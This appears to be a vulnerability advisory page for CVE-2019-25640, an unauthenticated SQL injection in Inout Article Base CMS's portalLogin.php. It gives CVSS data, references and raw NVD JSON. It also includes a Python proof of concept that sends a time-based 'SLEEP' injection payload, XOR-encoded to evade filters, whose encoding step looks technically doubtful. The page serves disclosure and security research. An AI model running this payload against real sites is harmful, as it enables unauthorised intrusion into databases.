CVE-2019-25640

Description

Inout Article Base CMS contains SQL injection vulnerabilities that allow unauthenticated attackers to manipulate database queries through the 'p' and 'u' parameters. Attackers can inject SQL code using XOR-based payloads in GET requests to portalLogin.php to extract sensitive database information or cause denial of service through time-based attacks.

CVSS Details

CVSS Score

8.2

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Inout Article Base CMS (Latest version at time of disclosure)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import time

def xor_encode(payload, key):
    """Helper to XOR encode payload"""
    return ''.join(chr(ord(c) ^ key) for c in payload)

target_url = "http://target-host/portalLogin.php"

# Payload to test time-based blind injection
# Logic: ' OR SLEEP(5)--
raw_payload = "' OR SLEEP(5)--"
key = 1  # Example XOR key

# Encode payload to bypass filters
encoded_payload = xor_encode(raw_payload, key)

params = {
    "p": encoded_payload,
    "u": "test_user"
}

try:
    start_time = time.time()
    response = requests.get(target_url, params=params, timeout=10)
    elapsed = time.time() - start_time
    
    if elapsed >= 5:
        print(f"[+] Vulnerability Confirmed! Response took {elapsed:.2f}s")
    else:
        print(f"[-] Not Vulnerable. Response took {elapsed:.2f}s")
except Exception as e:
    print(f"Error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2019-25640
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2019-25640
[3] CVE Details https://www.cvedetails.com/cve/CVE-2019-25640/
[4] VulDB https://vuldb.com/cve/CVE-2019-25640
[5] https://www.exploit-db.com/exploits/46593
[6] https://www.inoutscripts.com/products/inout-article-base/
[7] https://www.vulncheck.com/advisories/inout-article-base-cms-lastest-sql-injection-via-portallogin-php

Raw JSON Data

JSON

{"cve": {"id": "CVE-2019-25640", "sourceIdentifier": "[email protected]", "published": "2026-03-24T12:16:05.193", "lastModified": "2026-05-01T14:41:28.180", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Inout Article Base CMS contains SQL injection vulnerabilities that allow unauthenticated attackers to manipulate database queries through the 'p' and 'u' parameters. Attackers can inject SQL code using XOR-based payloads in GET requests to portalLogin.php to extract sensitive database information or cause denial of service through time-based attacks."}, {"lang": "es", "value": "Inout Article Base CMS contiene vulnerabilidades de inyección SQL que permiten a atacantes no autenticados manipular consultas a la base de datos a través de los parámetros 'p' y 'u'. Los atacantes pueden inyectar código SQL utilizando cargas útiles basadas en XOR en solicitudes GET a portalLogin.php para extraer información sensible de la base de datos o causar denegación de servicio a través de ataques basados en tiempo."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N", "baseScore": 8.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/46593", "source": "[email protected]"}, {"url": "https://www.inoutscripts.com/products/inout-article-base/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/inout-article-base-cms-lastest-sql-injection-via-portallogin-php", "source": "[email protected]"}]}}